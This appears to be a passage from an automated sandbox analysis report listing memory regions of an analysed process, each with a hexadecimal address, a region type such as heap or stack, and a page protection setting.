319C000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
3CF1000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
2CAD000
|
stack
|
page read and write
|
||
|
EDA000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
2367000
|
direct allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2E29000
|
trusted library allocation
|
page read and write
|
||
|
FFD10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FDE0000
|
direct allocation
|
page read and write
|
||
|
315D000
|
stack
|
page read and write
|
||
|
E5E000
|
stack
|
page read and write
|
||
|
311E000
|
stack
|
page read and write
|
||
|
EAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
CFB000
|
heap
|
page read and write
|
||
|
880000
|
unkown
|
page readonly
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
9EF000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
578B000
|
heap
|
page read and write
|
||
|
575E000
|
stack
|
page read and write
|
||
|
5F8E000
|
stack
|
page read and write
|
||
|
22E0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2DD3000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
2DAD000
|
stack
|
page read and write
|
||
|
EC7000
|
trusted library allocation
|
page execute and read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2BAB000
|
heap
|
page read and write
|
||
|
57FC000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
3008000
|
heap
|
page read and write
|
||
|
BFD000
|
stack
|
page read and write
|
||
|
22CE000
|
stack
|
page read and write
|
||
|
73D000
|
stack
|
page read and write
|
||
|
2BDC000
|
stack
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
3550000
|
heap
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
2E1B000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
447000
|
unkown
|
page read and write
|
||
|
2FFD000
|
stack
|
page read and write
|
||
|
589E000
|
stack
|
page read and write
|
||
|
2DF5000
|
trusted library allocation
|
page read and write
|
||
|
50EE000
|
stack
|
page read and write
|
||
|
6B90000
|
heap
|
page read and write
|
||
|
2668000
|
heap
|
page read and write
|
||
|
22B0000
|
direct allocation
|
page read and write
|
||
|
445000
|
unkown
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
263E000
|
stack
|
page read and write
|
||
|
2E7D000
|
stack
|
page read and write
|
||
|
35AF000
|
stack
|
page read and write
|
||
|
9AE000
|
stack
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
10CE000
|
stack
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
24F1000
|
direct allocation
|
page read and write
|
||
|
E9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
561F000
|
stack
|
page read and write
|
||
|
F16000
|
heap
|
page read and write
|
||
|
17D000
|
stack
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
340F000
|
unkown
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
6520000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
2E01000
|
trusted library allocation
|
page read and write
|
||
|
68F8000
|
stack
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
50F0000
|
trusted library section
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
2DAD000
|
trusted library allocation
|
page read and write
|
||
|
2360000
|
direct allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
2399000
|
direct allocation
|
page read and write
|
There are 369 hidden memdumps, click here to show them.